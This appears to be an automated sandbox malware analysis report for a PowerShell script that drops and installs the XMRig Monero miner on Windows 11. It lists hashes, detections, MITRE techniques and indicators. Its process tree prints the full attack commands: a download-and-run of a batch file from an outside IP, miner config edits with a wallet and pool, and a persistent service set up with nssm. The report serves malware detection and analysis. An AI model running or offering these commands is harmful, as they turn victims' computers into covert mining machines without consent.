xmrig | 6341b0a8cac2c02b00e1de582e4c5f0ae1ac6fbb15125e8397f691e1ef502de2

Analysis

max time kernel
1200s
max time network
1192s
platform
windows11-21h2_x64
resource
win11-20240704-en
resource tags

arch:x64arch:x86image:win11-20240704-enlocale:en-usos:windows11-21h2-x64system
submitted
05/07/2024, 07:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

run.ps1
Size

148B
MD5

ddb62c4ea4689b1f655b79623f339bea
SHA1

073307523d294426635cf5a29f76bcc1a1885dd8
SHA256

6341b0a8cac2c02b00e1de582e4c5f0ae1ac6fbb15125e8397f691e1ef502de2
SHA512

9a0482ed71309780d7e21ef7d21701ea4b96ab07fc9ddff30cb5ae2915296b44e821672680652a4cc77e24470f2a8012578f70dea266ac921a8e958943050dc2

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.254.97.190:2024/test.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral3/files/0x000100000002aa1c-73.dat	family_xmrig
behavioral3/files/0x000100000002aa1c-73.dat	xmrig
behavioral3/memory/1832-76-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-201-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-202-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-203-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-204-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-205-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-206-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-207-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-208-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-209-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-210-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-211-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-212-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-213-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-214-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-215-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-216-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-217-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-218-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-219-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-220-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-221-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-222-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-223-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-224-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-225-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-226-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-227-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-228-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-229-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-230-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-231-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-232-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-233-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-234-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-235-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-236-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-237-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-238-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-239-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-241-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-242-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-243-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-244-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-245-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-246-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-247-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-248-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-249-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-250-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-251-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-252-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-253-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-254-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-255-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-256-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-257-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-258-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-259-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-260-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-261-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3920-262-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 4 IoCs

flow	pid	Process
1	4252	powershell.exe
3	4360	powershell.exe
4	4476	powershell.exe
5	1256	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
1832	xmrig.exe
4832	nssm.exe
1244	nssm.exe
4300	nssm.exe
432	nssm.exe
4868	nssm.exe
1152	nssm.exe
2640	nssm.exe
3920	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
5	raw.githubusercontent.com
2	raw.githubusercontent.com
4	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4884	sc.exe
1244	sc.exe
3924	sc.exe
3376	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4360	powershell.exe
2148	powershell.exe
4036	powershell.exe
1520	powershell.exe
3532	powershell.exe
1256	powershell.exe
4476	powershell.exe
1920	powershell.exe
5020	powershell.exe
4252	powershell.exe
3024	powershell.exe
3564	powershell.exe
1568	powershell.exe
3672	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
1144	Process not Found
2740	Process not Found
2284	Process not Found
3320	timeout.exe
4540	timeout.exe
3544	timeout.exe
1668	timeout.exe
1396	Process not Found
1688	Process not Found
1264	Process not Found
764	Process not Found
4376	timeout.exe
3988	Process not Found
4540	Process not Found
988	Process not Found
4136	timeout.exe
4680	timeout.exe
4332	timeout.exe
5052	Process not Found
2832	timeout.exe
3116	timeout.exe
4884	timeout.exe
3256	timeout.exe
1012	Process not Found
2460	timeout.exe
2396	timeout.exe
1364	timeout.exe
4800	timeout.exe
2272	Process not Found
908	timeout.exe
4860	timeout.exe
4904	timeout.exe
3648	Process not Found
1056	Process not Found
1456	Process not Found
4872	Process not Found
3024	timeout.exe
740	timeout.exe
3244	timeout.exe
4820	Process not Found
3380	Process not Found
1572	timeout.exe
1592	timeout.exe
2404	timeout.exe
8	timeout.exe
2096	Process not Found
2444	Process not Found
4804	Process not Found
1400	Process not Found
2896	timeout.exe
3352	timeout.exe
2464	timeout.exe
4708	timeout.exe
2716	Process not Found
3648	timeout.exe
3112	timeout.exe
4436	timeout.exe
1028	timeout.exe
4924	Process not Found
5016	timeout.exe
3648	timeout.exe
4248	timeout.exe
936	timeout.exe
4444	timeout.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
4588	taskkill.exe
3260	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
4252	powershell.exe
4252	powershell.exe
4360	powershell.exe
4360	powershell.exe
4476	powershell.exe
4476	powershell.exe
2148	powershell.exe
2148	powershell.exe
3024	powershell.exe
3024	powershell.exe
3564	powershell.exe
3564	powershell.exe
4036	powershell.exe
4036	powershell.exe
1920	powershell.exe
1920	powershell.exe
1568	powershell.exe
1568	powershell.exe
3672	powershell.exe
3672	powershell.exe
1520	powershell.exe
1520	powershell.exe
5020	powershell.exe
5020	powershell.exe
1256	powershell.exe
1256	powershell.exe
3532	powershell.exe
3532	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4252	powershell.exe
Token: SeDebugPrivilege	4588	taskkill.exe
Token: SeDebugPrivilege	4360	powershell.exe
Token: SeDebugPrivilege	3260	taskkill.exe
Token: SeDebugPrivilege	4476	powershell.exe
Token: SeDebugPrivilege	2148	powershell.exe
Token: SeDebugPrivilege	3024	powershell.exe
Token: SeDebugPrivilege	3564	powershell.exe
Token: SeDebugPrivilege	4036	powershell.exe
Token: SeDebugPrivilege	1920	powershell.exe
Token: SeDebugPrivilege	1568	powershell.exe
Token: SeDebugPrivilege	3672	powershell.exe
Token: SeDebugPrivilege	1520	powershell.exe
Token: SeDebugPrivilege	5020	powershell.exe
Token: SeDebugPrivilege	1256	powershell.exe
Token: SeDebugPrivilege	3532	powershell.exe
Token: SeLockMemoryPrivilege	3920	xmrig.exe
Token: SeIncreaseQuotaPrivilege	1368	WMIC.exe
Token: SeSecurityPrivilege	1368	WMIC.exe
Token: SeTakeOwnershipPrivilege	1368	WMIC.exe
Token: SeLoadDriverPrivilege	1368	WMIC.exe
Token: SeSystemProfilePrivilege	1368	WMIC.exe
Token: SeSystemtimePrivilege	1368	WMIC.exe
Token: SeProfSingleProcessPrivilege	1368	WMIC.exe
Token: SeIncBasePriorityPrivilege	1368	WMIC.exe
Token: SeCreatePagefilePrivilege	1368	WMIC.exe
Token: SeBackupPrivilege	1368	WMIC.exe
Token: SeRestorePrivilege	1368	WMIC.exe
Token: SeShutdownPrivilege	1368	WMIC.exe
Token: SeDebugPrivilege	1368	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1368	WMIC.exe
Token: SeRemoteShutdownPrivilege	1368	WMIC.exe
Token: SeUndockPrivilege	1368	WMIC.exe
Token: SeManageVolumePrivilege	1368	WMIC.exe
Token: 33	1368	WMIC.exe
Token: 34	1368	WMIC.exe
Token: 35	1368	WMIC.exe
Token: 36	1368	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1368	WMIC.exe
Token: SeSecurityPrivilege	1368	WMIC.exe
Token: SeTakeOwnershipPrivilege	1368	WMIC.exe
Token: SeLoadDriverPrivilege	1368	WMIC.exe
Token: SeSystemProfilePrivilege	1368	WMIC.exe
Token: SeSystemtimePrivilege	1368	WMIC.exe
Token: SeProfSingleProcessPrivilege	1368	WMIC.exe
Token: SeIncBasePriorityPrivilege	1368	WMIC.exe
Token: SeCreatePagefilePrivilege	1368	WMIC.exe
Token: SeBackupPrivilege	1368	WMIC.exe
Token: SeRestorePrivilege	1368	WMIC.exe
Token: SeShutdownPrivilege	1368	WMIC.exe
Token: SeDebugPrivilege	1368	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1368	WMIC.exe
Token: SeRemoteShutdownPrivilege	1368	WMIC.exe
Token: SeUndockPrivilege	1368	WMIC.exe
Token: SeManageVolumePrivilege	1368	WMIC.exe
Token: 33	1368	WMIC.exe
Token: 34	1368	WMIC.exe
Token: 35	1368	WMIC.exe
Token: 36	1368	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2084	WMIC.exe
Token: SeSecurityPrivilege	2084	WMIC.exe
Token: SeTakeOwnershipPrivilege	2084	WMIC.exe
Token: SeLoadDriverPrivilege	2084	WMIC.exe
Token: SeSystemProfilePrivilege	2084	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3920	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4252 wrote to memory of 4244	4252	powershell.exe	79
PID 4252 wrote to memory of 4244	4252	powershell.exe	79
PID 4244 wrote to memory of 4588	4244	cmd.exe	81
PID 4244 wrote to memory of 4588	4244	cmd.exe	81
PID 4244 wrote to memory of 4360	4244	cmd.exe	83
PID 4244 wrote to memory of 4360	4244	cmd.exe	83
PID 4360 wrote to memory of 4708	4360	powershell.exe	84
PID 4360 wrote to memory of 4708	4360	powershell.exe	84
PID 4708 wrote to memory of 2332	4708	cmd.exe	85
PID 4708 wrote to memory of 2332	4708	cmd.exe	85
PID 2332 wrote to memory of 3368	2332	net.exe	86
PID 2332 wrote to memory of 3368	2332	net.exe	86
PID 4708 wrote to memory of 3788	4708	cmd.exe	87
PID 4708 wrote to memory of 3788	4708	cmd.exe	87
PID 4708 wrote to memory of 4584	4708	cmd.exe	88
PID 4708 wrote to memory of 4584	4708	cmd.exe	88
PID 4708 wrote to memory of 2100	4708	cmd.exe	89
PID 4708 wrote to memory of 2100	4708	cmd.exe	89
PID 4708 wrote to memory of 4540	4708	cmd.exe	90
PID 4708 wrote to memory of 4540	4708	cmd.exe	90
PID 4708 wrote to memory of 4832	4708	cmd.exe	91
PID 4708 wrote to memory of 4832	4708	cmd.exe	91
PID 4708 wrote to memory of 4884	4708	cmd.exe	92
PID 4708 wrote to memory of 4884	4708	cmd.exe	92
PID 4708 wrote to memory of 1244	4708	cmd.exe	93
PID 4708 wrote to memory of 1244	4708	cmd.exe	93
PID 4708 wrote to memory of 3260	4708	cmd.exe	94
PID 4708 wrote to memory of 3260	4708	cmd.exe	94
PID 4708 wrote to memory of 4476	4708	cmd.exe	95
PID 4708 wrote to memory of 4476	4708	cmd.exe	95
PID 4708 wrote to memory of 2148	4708	cmd.exe	96
PID 4708 wrote to memory of 2148	4708	cmd.exe	96
PID 4708 wrote to memory of 3024	4708	cmd.exe	97
PID 4708 wrote to memory of 3024	4708	cmd.exe	97
PID 4708 wrote to memory of 1832	4708	cmd.exe	98
PID 4708 wrote to memory of 1832	4708	cmd.exe	98
PID 4708 wrote to memory of 1896	4708	cmd.exe	99
PID 4708 wrote to memory of 1896	4708	cmd.exe	99
PID 1896 wrote to memory of 3564	1896	cmd.exe	100
PID 1896 wrote to memory of 3564	1896	cmd.exe	100
PID 3564 wrote to memory of 3940	3564	powershell.exe	101
PID 3564 wrote to memory of 3940	3564	powershell.exe	101
PID 4708 wrote to memory of 4036	4708	cmd.exe	102
PID 4708 wrote to memory of 4036	4708	cmd.exe	102
PID 4708 wrote to memory of 1920	4708	cmd.exe	103
PID 4708 wrote to memory of 1920	4708	cmd.exe	103
PID 4708 wrote to memory of 1568	4708	cmd.exe	104
PID 4708 wrote to memory of 1568	4708	cmd.exe	104
PID 4708 wrote to memory of 3672	4708	cmd.exe	105
PID 4708 wrote to memory of 3672	4708	cmd.exe	105
PID 4708 wrote to memory of 1520	4708	cmd.exe	106
PID 4708 wrote to memory of 1520	4708	cmd.exe	106
PID 4708 wrote to memory of 5020	4708	cmd.exe	107
PID 4708 wrote to memory of 5020	4708	cmd.exe	107
PID 4708 wrote to memory of 1256	4708	cmd.exe	108
PID 4708 wrote to memory of 1256	4708	cmd.exe	108
PID 4708 wrote to memory of 3532	4708	cmd.exe	109
PID 4708 wrote to memory of 3532	4708	cmd.exe	109
PID 4708 wrote to memory of 3924	4708	cmd.exe	110
PID 4708 wrote to memory of 3924	4708	cmd.exe	110
PID 4708 wrote to memory of 3376	4708	cmd.exe	111
PID 4708 wrote to memory of 3376	4708	cmd.exe	111
PID 4708 wrote to memory of 4832	4708	cmd.exe	112
PID 4708 wrote to memory of 4832	4708	cmd.exe	112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\run.ps1
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\script_e39ec5d4.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4244
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4588
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://185.254.97.190:2024/test.txt', $tempfile); & $tempfile 497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK; Remove-Item -Force $tempfile"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4360
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp77C0.tmp.bat" 497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4708
    - - C:\Windows\system32\net.exe
        
        net session
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2332
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        6⤵
        
        PID:3368
    - - C:\Windows\system32\where.exe
        
        where powershell
        5⤵
        
        PID:3788
    - - C:\Windows\system32\where.exe
        
        where find
        5⤵
        
        PID:4584
    - - C:\Windows\system32\where.exe
        
        where findstr
        5⤵
        
        PID:2100
    - - C:\Windows\system32\where.exe
        
        where tasklist
        5⤵
        
        PID:4540
    - - C:\Windows\system32\where.exe
        
        where sc
        5⤵
        
        PID:4832
    - - C:\Windows\system32\sc.exe
        
        sc stop moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:4884
    - - C:\Windows\system32\sc.exe
        
        sc delete moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:1244
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /t /im xmrig.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3260
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4476
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2148
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3024
    - - C:\Users\Admin\moneroocean\xmrig.exe
        
        "C:\Users\Admin\moneroocean\xmrig.exe" --help
        5⤵
        Executes dropped EXE
        
        PID:1832
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1896
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3564
        
        C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        7⤵
        
        PID:3940
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4036
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1920
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Tofzpnhk\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1568
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3672
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1520
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5020
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1256
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3532
    - - C:\Windows\system32\sc.exe
        
        sc stop moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:3924
    - - C:\Windows\system32\sc.exe
        
        sc delete moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:3376
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
        5⤵
        Executes dropped EXE
        
        PID:4832
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
        5⤵
        Executes dropped EXE
        
        PID:1244
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
        5⤵
        Executes dropped EXE
        
        PID:4300
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
        5⤵
        Executes dropped EXE
        
        PID:432
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
        5⤵
        Executes dropped EXE
        
        PID:4868
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
        5⤵
        Executes dropped EXE
        
        PID:1152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1956
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1368
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2588
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2084
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1668
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4964
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3288
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:224
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4760
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3320
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1472
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1572
